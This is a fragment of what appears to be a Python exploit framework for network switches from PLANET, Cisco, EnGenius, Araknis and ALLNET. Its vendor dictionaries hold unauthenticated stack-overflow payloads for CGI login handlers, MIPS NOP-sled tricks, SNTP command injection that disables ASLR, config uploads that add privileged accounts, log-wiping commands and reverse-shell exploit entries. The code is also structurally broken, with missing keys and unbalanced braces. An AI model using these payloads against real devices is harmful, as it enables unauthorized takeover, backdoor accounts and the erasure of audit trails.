    						'sys_timeSntp_set':0x42243C,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
    						'sys_timeSntpDel_set':0x42243C,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
    						'sys_timeSettings_set':0x424DE0,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    					# Interesting when there is a fresh heap with 0x00's (4 x 0x00 == MIPS NOP),
    					# and to fill wider area with sending '&%8f%84%01=%8f%84%80%18' where:
    					# NOP's
    					# '24%04%FF=' : '=' will be replaced with 0x00, li $a0, 0xFFFFFF00
    					# '%24%04%FF%FF' : li $a0, 0xFFFFFFFF
    					'heack_cgi_shell': {
    						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
    						'query':'username='+ self.random_string(112) +'_RA_START&password='+ self.random_string(80) +'&login=1'+ ('&%24%04%FF=%24%04%FF%FF' * 50) +'_SHELLCODE',
    						'START':0x10010104,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP' :0x10600604,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 28,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 20,					# filler/garbage (not used for something constructive)
    						'align': 0,						# Align opcodes in memory
    						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    		# Vendor templates, Vendor_ETag() will be merged to here
    		# (dont delete anything here thats not moved to Vendor_ETag())
    		Vendor_Template = {
    			'Planet': {
    				'vendor': 'PLANET Technology Corp.',
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': True,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': True,
    						'safe': True
    				# Verify lacking authentication
    				'verify': {
    							'authenticated': False,
    							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
    							'content_check':'Image Signature Error',
    							'vulnerable': True,
    							'safe': True
    						'dispatcher.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'username=admin&password='+ self.random_string(184) + '&login=1',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
    						#'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" nopassword\n\n------', # Yep, working too
    						'vulnerable': True,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,
    						'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
    						'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
    						'vulnerable': True,
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					'stack_cgi_diag': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'&_CMD_&login=1',
    						'sys_ping_post_SIGSEGV': False,		# SIGSEGV ?
    						'workaround':True,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',
    						'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD
    						'log_settings_set_SIGSEGV':False,			# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'',						# Clean RAM log CMD
    						'log_ramClear_SIGSEGV':False,				# Clean RAM log SIGSEGV ?
    						'log_fileClear_cmd':'',						# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':False,				# Clean FILE log SIGSEGV ?
    						'workaround':True,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',
    						'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
    						'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
    						'sys_timeSettings_set_SIGSEGV': False,		# SIGSEGV ?
    						'workaround':True,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
    					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'workaround':True,	# My LAB workaround
    						'stack':True, # False = use Heap, and there are no ASLR
    						'vulnerable': True,
    						'safe': True
    			'Cisco': { 
    				'vendor': 'Cisco Systems, Inc.',
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': True,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': True,
    						'safe': True
    				# Verify lacking authentication
    				'verify': { 
    							'authenticated': False,
    							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/update "language" (PoC: Create invalid file to verify)',
    							'check_uri':False,		# 
    							'content': self.random_string(30), # We checking returned 'errMsgLangMG' and LEN of this text
    							'content_check':'errMsgLangMG',	#
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
    							'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)
    							'content_check':'Copy: Illegal software format',
    							'vulnerable': True,
    							'safe': True
    						'login.cgi': {
    							'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
    							'authenticated': False,
    							'check_uri':'/tmp/VUL.TXT', # We cannot control the content...
    							'content':'{"_ds=1&username='+ self.random_string(32) +'&password=/tmp/VUL.TXT&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    						'set.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
    						#'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" nopassword\n\n------', # Yep, working too
    						'vulnerable': True,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,
    						'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
    						'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
    						'vulnerable': True,
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					'stack_cgi_diag': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						'sys_ping_post_SIGSEGV': True,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						'log_settings_set_cmd':'',					# Disable Logging CMD
    						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'',						# Clean RAM CMD
    						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
    						'log_fileClear_cmd':'',						# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						'sys_timeSntp_set_cmd':'&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123',
    						'sys_timeSntp_set_check':'&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123',
    						'sys_timeSntpDel_set_cmd':'&sntpServer=+&cursntpPort=123',				# CMD
    						'sys_timeSettings_set_cmd_enable':'&sntpStatus=1',	# Enable CMD
    						'sys_timeSettings_set_cmd_disable':'&sntpStatus=0',	# Disable CMD
    						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
    					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'stack':True, # False = use Heap, and there are no ASLR
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    			'EnGenius': { 
    				'vendor': 'EnGenius Technologies, Inc.',
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': False,
    					'safe': True
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': False,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': False,
    						'safe': True
    				# Verify lacking authentication
    				'verify': { 
    						'security.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'usr=admin&pswrd=' + self.random_string(280),
    							'vulnerable': True,
    							'safe': True
    						'datajson.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'usr=admin&pswrd=' + self.random_string(288),
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/sn_httpupload.cgi?', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'vulnerable': False,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,	# <================================
    						'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
    						'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
    						'vulnerable': False, # It is vulnerable, but I am not using this authenticated code here :>
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					# Bonus: Disable and clean logs
    					'stack_cgi_add_account': {
    						'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_del_account': {
    						'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
    						'authenticated': False,
    						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_diag': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
    						'sys_ping_post_SIGSEGV': True,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
    						'log_settings_set_cmd':'&en=0',				# Disable Logging CMD
    						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'&ta=0',					# Clean RAM CMD
    						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
    						'log_fileClear_cmd':'&ta=1',				# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
    						'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',
    						'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',
    						'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',				# CMD
    						'sys_timeSettings_set_cmd_enable':'&sn=1',	# Enable CMD
    						'sys_timeSettings_set_cmd_disable':'&sn=0',	# Disable CMD
    						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					# Used for both 'heap' and 'stack'
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						#'stack':False, # False = use Heap, and there are no ASLR
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    			'Araknis': { 
    				'vendor': 'Araknis Networks',
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': False,
    					'safe': True
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': False,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': False,
    						'safe': True
    				# Verify lacking authentication
    				'verify': { 
    						'security.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'usr=admin&pswrd=' + self.random_string(280),
    							'vulnerable': True,
    							'safe': True
    						'datajson.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'usr=admin&pswrd=' + self.random_string(288),
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/sn_httpupload.cgi?', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'vulnerable': False,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,	# <================================
    						'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
    						'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
    						'vulnerable': False, # It is vulnerable, but I am not using this authenticated code here :>
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					'stack_cgi_add_account': {
    						'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_del_account': {
    						'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
    						'authenticated': False,
    						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_diag': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
    						'sys_ping_post_SIGSEGV': True,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
    						'log_settings_set_cmd':'&en=0',				# Disable Logging CMD
    						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'&ta=0',					# Clean RAM CMD
    						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
    						'log_fileClear_cmd':'&ta=1',				# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
    						'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',
    						'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',
    						'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',				# CMD
    						'sys_timeSettings_set_cmd_enable':'&sn=1',	# Enable CMD
    						'sys_timeSettings_set_cmd_disable':'&sn=0',	# Disable CMD
    						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					# Used for both 'heap' and 'stack'
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'stack':False, # False = use Heap, and there are no ASLR
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    			'ALLNET_JSON': { 
    				'vendor': 'ALLNET GmbH Computersysteme',
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': True,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': True,
    						'safe': True
    				# Verify lacking authentication
    				'verify': { 
    							'authenticated': False,
    							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
    							'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)
    							'content_check':'Copy: Illegal software format',
    							'vulnerable': True,
    							'safe': True
    						'login.cgi': {
    							'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
    							'authenticated': False,
    							'check_uri':'/tmp/VUL.TXT', # We cannot control the content...
    							'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    						'set.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
    						'vulnerable': True,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,
    						'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
    						'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
    						'vulnerable': True,
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					'stack_cgi_diag': {	# Not vulnerable 
    						'vulnerable': False,
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',	# Enable Logging CMD
    						'log_settings_set_cmd':'&empty=1',			# Disable Logging CMD
    						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'&target=0',				# Clean RAM CMD
    						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
    						'log_fileClear_cmd':'&target=1',			# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139',
    						'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139',
    						'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139',				# CMD
    						'sys_timeSettings_set_cmd_enable':'&sntp=1',	# Enable CMD
    						'sys_timeSettings_set_cmd_disable':'&sntp=0',	# Disable CMD
    						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': False,
    						#'vulnerable': True,
    						'safe': True
    					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
    					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'stack':True, # False = use Heap, and there are no ASLR
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    			'ALLNET': {
    				'vendor': 'ALLNET GmbH Computersysteme',
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': True,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': True,
    						'safe': True
    				# Verify lacking authentication
    				'verify': {
    							'authenticated': False,
    							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
    							'content_check':'Image Signature Error',
    							'vulnerable': True,
    							'safe': True
    						'dispatcher.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'username=admin&password='+ self.random_string(184) + '&login=1',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
    							'content_check':'Image Signature Error',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (Frontend to "httpuploadfirmware.cgi")',
    							'content':'Firm Upgrade',
    							'content_check':'Firm Upgrade',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Reset device to factory default (PoC: Too dangerous to verify)',
    							'content':'Too dangerous to verify',
    							'vulnerable': True,
    							'safe': False
    							'authenticated': False,
    							'description':'System basic information configuration (Frontend to "change_mac_addr_set.cgi")',
    							'vulnerable': True,
    							'safe': True
    						'change_mac_addr_set.cgi': {
